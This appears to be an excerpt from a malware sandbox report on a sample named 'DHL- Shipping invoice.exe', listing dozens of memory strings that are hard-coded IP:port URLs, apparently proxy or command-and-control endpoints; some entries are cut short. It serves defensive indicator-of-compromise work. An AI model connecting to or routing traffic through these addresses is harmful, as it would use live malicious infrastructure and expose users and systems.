                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.254.188:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.57.37.125:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.57.37.125:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.26.210:32650
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.26.210:32650://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.160.171:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.160.171:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.162.7
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.162.75:1976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.162.75:1976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.224.91:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.224.91:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.35:1976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.35:1976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.37:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.37:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.39:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.39:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.5
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.53:1976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.56:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.56:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.57:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.57:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.58:1976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.58:1976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.58:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.58:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.46.180:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.46.180:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.5
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.10:1976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.10:1976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.1:1976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.28:1976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.28:1976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9814A5000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981475000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.28:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98147E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.28:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.70.106.1:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98168B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.70.106.1:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.74.91.244
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.74.91.244://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.74.91.244:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.77.188.131
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.77.188.131://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.77.188.131:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.86.252.91:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.86.252.91:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.86.46.112:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.86.46.112:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E82000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.193.58.96:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.193.58.96:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.49.148.167:9001
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.49.148.167:9001://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.61.48.219:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.61.48.219:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.128.40.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.128.40.142:65533
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.128.40.142:65533://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.132.184.228:8181
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.132.184.228:8181://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98200E000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.167.51:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.167.51:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.168.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.168.21:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.168.21:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.20.174:15673
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.20.174:15673://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.135.159.78:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.135.160.152:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.11.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983471000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.11.102:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.11.102:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.177.137:13220
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.55.205:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.55.205:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.155.153.244:15673://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.155.165.196:15673://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.157.49.204:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.157.49.204:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.231.22.228
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.231.22.228://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.231.22.228:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.249.11.143:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.249.11.143:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.251.119.79:45787
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.251.119.79:45787://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:8084
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:8084://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:8086
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:8086://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:84
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:84://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.16
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5013
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5013://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980744000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5020
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5020://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98160D000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5038
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5038://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5214
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5214://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5215
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:5215://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:6010
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:6010://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:6021
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:6021://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:6045
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.165:6045://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.166:6004
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.166:6004://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.166:6005
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.11.95.166:6005://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.112.125.57:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.112.125.57:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.115.115.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.115.115.145:31141
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.115.115.145:31141://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.115.115.146:31141
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.115.115.146:31141://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:17827
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:17827://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:35942
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:35942://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.209
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.209://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.209:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.30.231
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.30.231://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.30.231:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.104
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.104://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.104:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.140
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.140://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.140:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.120.178.197:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.120.178.197:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.125.222.81:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.125.222.81:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.128.133.153:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.128.133.153:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.128.135.1:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.128.135.1:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.133.168.82:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.133.168.82:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.138.87.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.138.87.238:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.138.87.238:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.139.11.134
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.139.11.134://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.139.11.134:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.14.174.148
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.14.174.148://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.14.174.148:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.140.189.95:29003
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.140.189.95:29003://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.150.25.132:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.150.25.132:8080://proxy
